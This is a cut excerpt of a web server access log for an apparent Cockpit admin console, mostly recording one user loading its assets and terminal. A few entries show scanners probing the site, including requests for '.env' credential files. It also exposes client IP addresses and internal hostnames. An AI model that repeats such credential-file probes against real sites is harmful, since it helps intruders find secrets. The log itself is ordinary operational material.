+[29/Jan/2026:06:43:42 +0000] - 200 200 - GET https terminal.profibot.hu "/cockpit/@localhost/system/services.js" [Client 84.1.26.27] [Length 190208] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[29/Jan/2026:06:43:42 +0000] - 200 200 - GET https terminal.profibot.hu "/cockpit/@localhost/updates/updates.css" [Client 84.1.26.27] [Length 140304] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[29/Jan/2026:06:43:42 +0000] - 200 200 - GET https terminal.profibot.hu "/cockpit/@localhost/manifests.js" [Client 84.1.26.27] [Length 10180] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[29/Jan/2026:06:43:42 +0000] - 200 200 - GET https terminal.profibot.hu "/cockpit/@localhost/updates/updates.js" [Client 84.1.26.27] [Length 344016] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[29/Jan/2026:06:43:43 +0000] - 200 200 - GET https terminal.profibot.hu "/cockpit/@localhost/updates/po.js" [Client 84.1.26.27] [Length 5] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[29/Jan/2026:06:43:43 +0000] - 200 200 - GET https terminal.profibot.hu "/cockpit/@localhost/base1/cockpit.js" [Client 84.1.26.27] [Length 16702] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[29/Jan/2026:06:43:43 +0000] - 200 200 - GET https terminal.profibot.hu "/cockpit/@localhost/base1/po.js" [Client 84.1.26.27] [Length 5] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[29/Jan/2026:06:43:43 +0000] - 200 200 - GET https terminal.profibot.hu "/cockpit/@localhost/system/po.js" [Client 84.1.26.27] [Length 5] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[29/Jan/2026:06:43:43 +0000] - 200 200 - GET https terminal.profibot.hu "/cockpit/@localhost/base1/cockpit.js" [Client 84.1.26.27] [Length 16702] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[29/Jan/2026:06:43:43 +0000] - 200 200 - GET https terminal.profibot.hu "/cockpit/@localhost/base1/po.js" [Client 84.1.26.27] [Length 5] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[29/Jan/2026:06:43:45 +0000] - 200 200 - GET https terminal.profibot.hu "/cockpit/static/fonts/RedHatDisplay-Medium.woff2" [Client 84.1.26.27] [Length 26664] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[29/Jan/2026:06:43:57 +0000] - 200 200 - GET https terminal.profibot.hu "/cockpit/@localhost/system/services.html" [Client 84.1.26.27] [Length 322] [Gzip 1.83] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[29/Jan/2026:06:43:58 +0000] - 200 200 - GET https terminal.profibot.hu "/cockpit/@localhost/base1/po.js" [Client 84.1.26.27] [Length 5] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[29/Jan/2026:06:43:58 +0000] - 200 200 - GET https terminal.profibot.hu "/cockpit/@localhost/system/po.js" [Client 84.1.26.27] [Length 5] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[29/Jan/2026:06:43:58 +0000] - 200 200 - GET https terminal.profibot.hu "/cockpit/@localhost/base1/cockpit.js" [Client 84.1.26.27] [Length 16702] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[29/Jan/2026:06:43:58 +0000] - 200 200 - GET https terminal.profibot.hu "/cockpit/@localhost/system/services.css" [Client 84.1.26.27] [Length 135281] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[29/Jan/2026:06:43:58 +0000] - 200 200 - GET https terminal.profibot.hu "/cockpit/@localhost/system/services.js" [Client 84.1.26.27] [Length 190201] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[29/Jan/2026:06:44:31 +0000] - 200 200 - GET https terminal.profibot.hu "/cockpit/static/fonts/RedHatMono-Regular.woff2" [Client 84.1.26.27] [Length 20952] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[29/Jan/2026:06:44:49 +0000] - 200 200 - GET https terminal.profibot.hu "/cockpit/@localhost/navigator/index.html" [Client 84.1.26.27] [Length 2947] [Gzip 3.83] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[29/Jan/2026:06:44:49 +0000] - 200 200 - GET https terminal.profibot.hu "/cockpit/@localhost/navigator/style.css" [Client 84.1.26.27] [Length 12875] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[29/Jan/2026:06:44:49 +0000] - 200 200 - GET https terminal.profibot.hu "/cockpit/@localhost/navigator/cockpit.css" [Client 84.1.26.27] [Length 81804] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[29/Jan/2026:06:44:49 +0000] - 200 200 - GET https terminal.profibot.hu "/cockpit/@localhost/navigator/fontawesome/attribution.js" [Client 84.1.26.27] [Length 198] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[29/Jan/2026:06:44:49 +0000] - 200 200 - GET https terminal.profibot.hu "/cockpit/@localhost/base1/cockpit.js" [Client 84.1.26.27] [Length 16702] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[29/Jan/2026:06:44:49 +0000] - 200 200 - GET https terminal.profibot.hu "/cockpit/@localhost/manifests.js" [Client 84.1.26.27] [Length 10180] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[29/Jan/2026:06:44:49 +0000] - 200 200 - GET https terminal.profibot.hu "/cockpit/@localhost/navigator/fontawesome/css/all.min.css" [Client 84.1.26.27] [Length 59412] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[29/Jan/2026:06:44:49 +0000] - 404 404 - GET https terminal.profibot.hu "/cockpit/@localhost/*/po.js" [Client 84.1.26.27] [Length 2215] [Gzip 1.46] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[29/Jan/2026:06:44:50 +0000] - 200 200 - GET https terminal.profibot.hu "/cockpit/@localhost/navigator/main.js" [Client 84.1.26.27] [Length 7166] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[29/Jan/2026:06:44:50 +0000] - 200 200 - GET https terminal.profibot.hu "/cockpit/@localhost/navigator/branding/logo-light.svg" [Client 84.1.26.27] [Length 13169] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[29/Jan/2026:06:44:50 +0000] - 200 200 - GET https terminal.profibot.hu "/cockpit/static/fonts/RedHatText-Regular.woff2" [Client 84.1.26.27] [Length 25844] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[29/Jan/2026:06:44:50 +0000] - 200 200 - GET https terminal.profibot.hu "/cockpit/@localhost/navigator/version.js" [Client 84.1.26.27] [Length 60] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[29/Jan/2026:06:44:50 +0000] - 200 200 - GET https terminal.profibot.hu "/cockpit/@localhost/navigator/components/NavWindow.js" [Client 84.1.26.27] [Length 25155] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[29/Jan/2026:06:44:50 +0000] - 200 200 - GET https terminal.profibot.hu "/cockpit/@localhost/navigator/components/ModalPrompt.js" [Client 84.1.26.27] [Length 6702] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[29/Jan/2026:06:44:50 +0000] - 200 200 - GET https terminal.profibot.hu "/cockpit/static/fonts/RedHatText-Medium.woff2" [Client 84.1.26.27] [Length 26880] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[29/Jan/2026:06:44:50 +0000] - 200 200 - GET https terminal.profibot.hu "/cockpit/@localhost/navigator/fontawesome/webfonts/fa-solid-900.woff2" [Client 84.1.26.27] [Length 78288] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[29/Jan/2026:06:44:50 +0000] - 200 200 - GET https terminal.profibot.hu "/cockpit/@localhost/navigator/fontawesome/webfonts/fa-regular-400.woff2" [Client 84.1.26.27] [Length 13304] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[29/Jan/2026:06:44:50 +0000] - 200 200 - GET https terminal.profibot.hu "/cockpit/@localhost/navigator/components/NavDragDrop.js" [Client 84.1.26.27] [Length 6280] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[29/Jan/2026:06:44:50 +0000] - 200 200 - GET https terminal.profibot.hu "/cockpit/@localhost/navigator/components/SortFunctions.js" [Client 84.1.26.27] [Length 3372] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[29/Jan/2026:06:44:50 +0000] - 200 200 - GET https terminal.profibot.hu "/cockpit/@localhost/navigator/components/NavContextMenu.js" [Client 84.1.26.27] [Length 6488] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[29/Jan/2026:06:44:50 +0000] - 200 200 - GET https terminal.profibot.hu "/cockpit/@localhost/navigator/components/NavEntry.js" [Client 84.1.26.27] [Length 11783] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[29/Jan/2026:06:44:50 +0000] - 200 200 - GET https terminal.profibot.hu "/cockpit/@localhost/navigator/functions.js" [Client 84.1.26.27] [Length 3604] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[29/Jan/2026:06:44:50 +0000] - 200 200 - GET https terminal.profibot.hu "/cockpit/@localhost/navigator/components/NavDir.js" [Client 84.1.26.27] [Length 7720] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[29/Jan/2026:06:44:50 +0000] - 200 200 - GET https terminal.profibot.hu "/cockpit/@localhost/navigator/components/FileUpload.js" [Client 84.1.26.27] [Length 6484] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[29/Jan/2026:06:44:50 +0000] - 200 200 - GET https terminal.profibot.hu "/cockpit/@localhost/navigator/components/FileUploadManager.js" [Client 84.1.26.27] [Length 2156] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[29/Jan/2026:06:44:50 +0000] - 200 200 - GET https terminal.profibot.hu "/cockpit/@localhost/navigator/components/NavDownloader.js" [Client 84.1.26.27] [Length 1935] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[29/Jan/2026:06:44:50 +0000] - 200 200 - GET https terminal.profibot.hu "/cockpit/@localhost/navigator/components/NavFile.js" [Client 84.1.26.27] [Length 8402] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[29/Jan/2026:06:44:50 +0000] - 200 200 - GET https terminal.profibot.hu "/cockpit/@localhost/navigator/branding/logo-light.svg" [Client 84.1.26.27] [Length 13169] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[29/Jan/2026:06:44:50 +0000] - 200 200 - GET https terminal.profibot.hu "/cockpit/static/fonts/RedHatText-Italic.woff2" [Client 84.1.26.27] [Length 27044] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[29/Jan/2026:06:44:55 +0000] - 200 200 - GET https terminal.profibot.hu "/cockpit/@localhost/system/terminal.html" [Client 84.1.26.27] [Length 331] [Gzip 1.76] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[29/Jan/2026:06:44:55 +0000] - 200 200 - GET https terminal.profibot.hu "/cockpit/@localhost/base1/po.js" [Client 84.1.26.27] [Length 5] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[29/Jan/2026:06:44:55 +0000] - 200 200 - GET https terminal.profibot.hu "/cockpit/@localhost/base1/cockpit.js" [Client 84.1.26.27] [Length 16702] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[29/Jan/2026:06:44:55 +0000] - 200 200 - GET https terminal.profibot.hu "/cockpit/@localhost/system/terminal.css" [Client 84.1.26.27] [Length 36161] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[29/Jan/2026:06:44:55 +0000] - 200 200 - GET https terminal.profibot.hu "/cockpit/@localhost/system/po.js" [Client 84.1.26.27] [Length 5] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[29/Jan/2026:06:44:55 +0000] - 200 200 - GET https terminal.profibot.hu "/cockpit/@localhost/system/terminal.js" [Client 84.1.26.27] [Length 178131] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[29/Jan/2026:06:58:10 +0000] - 200 200 - GET https terminal.profibot.hu "/" [Client 13.211.222.145] [Length 4564] [Gzip 2.57] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 Assetnote/1.0.0" "-" +[29/Jan/2026:06:58:11 +0000] - 200 200 - HEAD https terminal.profibot.hu "/apps" [Client 13.211.222.145] [Length 0] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 Assetnote/1.0.0" "-" +[29/Jan/2026:06:58:11 +0000] - 405 405 - POST https terminal.profibot.hu "/apps" [Client 13.211.222.145] [Length 3250] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 Assetnote/1.0.0" "-" +[29/Jan/2026:07:01:22 +0000] - 200 200 - GET https terminal.profibot.hu "/" [Client 195.178.110.54] [Length 4564] [Gzip 2.57] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; U; Android 9; en-us; POCOPHONE F1 Build/PKQ1.180729.001) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/71.0.3578.141 Mobile Safari/537.36 XiaoMi/MiuiBrowser/10.9.7-g" "-" +[29/Jan/2026:07:01:38 +0000] - 200 200 - GET https terminal.profibot.hu "/static/login.js" [Client 195.178.110.54] [Length 4564] [Gzip 2.57] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/10.0.601.0 Safari/534.14" "-" +[29/Jan/2026:07:22:15 +0000] - 404 404 - HEAD https terminal.profibot.hu "/.env" [Client 104.244.74.39] [Length 0] [Gzip -] [Sent-to 192.168.100.43] "Python/3.13 aiohttp/3.11.18" "-" +[29/Jan/2026:07:22:15 +0000] - 404 404 - HEAD https terminal.profibot.hu "/.env.local" [Client 104.244.74.39] [Length 0] [Gzip -] [Sent-to 192.168.100.43] "Python/3.13 aiohttp/3.11.18" "-" +[29/Jan/2026:07:22:15 +0000] - 404 404 - HEAD https terminal.profibot.hu "/.env.prod" [Client 104.244.74.39] [Length 0] [Gzip -] [Sent-to 192.168.100.43] "Python/3.13 aiohttp/3.11.18" "-" +[29/Jan/2026:07:22:15 +0000] - 404 404 - HEAD https terminal.profibot.hu "/.env.dev" [Client 104.244.74.39] [Length 0] [Gzip -] [Sent-to 192.168.100.43] "Python/3.13 aiohttp/3.11.18" "-" +[29/Jan/2026:08:15:43 +0000] - 101 101 - GET https terminal.profibot.hu "/cockpit/socket" [Client 84.1.26.27] [Length 125644049] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[29/Jan/2026:08:59:32 +0000] - 200 200 - GET https terminal.profibot.hu "/system/terminal" [Client 84.1.26.27] [Length 4564] [Gzip 2.57] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[29/Jan/2026:08:59:32 +0000] - 200 200 - GET https terminal.profibot.hu "/cockpit/static/fonts/RedHatText-Regular.woff2" [Client 84.1.26.27] [Length 25844] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[29/Jan/2026:08:59:32 +0000] - 200 200 - GET https terminal.profibot.hu "/favicon.ico" [Client 84.1.26.27] [Length 9662] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[29/Jan/2026:08:59:32 +0000] - 401 401 - GET https terminal.profibot.hu "/cockpit/login" [Client 84.1.26.27] [Length 3250] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[29/Jan/2026:08:59:32 +0000] - 200 200 - GET https terminal.profibot.hu "/cockpit/static/fonts/RedHatText-Medium.woff2" [Client 84.1.26.27] [Length 26880] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[29/Jan/2026:08:59:41 +0000] - 200 200 - GET https terminal.profibot.hu "/cockpit/login" [Client 84.1.26.27] [Length 81] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[29/Jan/2026:08:59:41 +0000] - 200 200 - GET https terminal.profibot.hu "/system/terminal" [Client 84.1.26.27] [Length 861] [Gzip 2.56] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[29/Jan/2026:08:59:41 +0000] - 404 404 - GET https terminal.profibot.hu "/cockpit/@localhost/*/po.manifest.js" [Client 84.1.26.27] [Length 2215] [Gzip 1.46] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[29/Jan/2026:08:59:41 +0000] - 200 200 - GET https terminal.profibot.hu "/cockpit/@localhost/manifests.js" [Client 84.1.26.27] [Length 10180] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[29/Jan/2026:08:59:41 +0000] - 200 200 - GET https terminal.profibot.hu "/cockpit/@localhost/base1/cockpit.js" [Client 84.1.26.27] [Length 16702] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[29/Jan/2026:08:59:41 +0000] - 200 200 - GET https terminal.profibot.hu "/cockpit/@localhost/shell/shell.css" [Client 84.1.26.27] [Length 140027] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[29/Jan/2026:08:59:41 +0000] - 200 200 - GET https terminal.profibot.hu "/cockpit/@localhost/shell/po.js" [Client 84.1.26.27] [Length 5] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[29/Jan/2026:08:59:41 +0000] - 200 200 - GET https terminal.profibot.hu "/cockpit/@localhost/shell/shell.js" [Client 84.1.26.27] [Length 202424] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[29/Jan/2026:08:59:41 +0000] - 404 404 - GET https terminal.profibot.hu "/cockpit/@localhost/*/po.js" [Client 84.1.26.27] [Length 2215] [Gzip 1.46] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[29/Jan/2026:08:59:41 +0000] - 200 200 - GET https terminal.profibot.hu "/favicon.ico" [Client 84.1.26.27] [Length 9662] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[29/Jan/2026:08:59:41 +0000] - 200 200 - GET https terminal.profibot.hu "/cockpit/@localhost/updates/index.html" [Client 84.1.26.27] [Length 670] [Gzip 1.72] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[29/Jan/2026:08:59:41 +0000] - 200 200 - GET https terminal.profibot.hu "/cockpit/@localhost/system/index.html" [Client 84.1.26.27] [Length 334] [Gzip 2.08] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[29/Jan/2026:08:59:41 +0000] - 200 200 - GET https terminal.profibot.hu "/cockpit/@localhost/system/services.html" [Client 84.1.26.27] [Length 322] [Gzip 1.83] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[29/Jan/2026:08:59:41 +0000] - 200 200 - GET https terminal.profibot.hu "/cockpit/@localhost/system/terminal.html" [Client 84.1.26.27] [Length 331] [Gzip 1.76] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[29/Jan/2026:08:59:41 +0000] - 200 200 - GET https terminal.profibot.hu "/cockpit/@localhost/system/overview.css" [Client 84.1.26.27] [Length 77691] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[29/Jan/2026:08:59:41 +0000] - 200 200 - GET https terminal.profibot.hu "/cockpit/@localhost/updates/po.js" [Client 84.1.26.27] [Length 5] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[29/Jan/2026:08:59:41 +0000] - 200 200 - GET https terminal.profibot.hu "/cockpit/@localhost/updates/updates.css" [Client 84.1.26.27] [Length 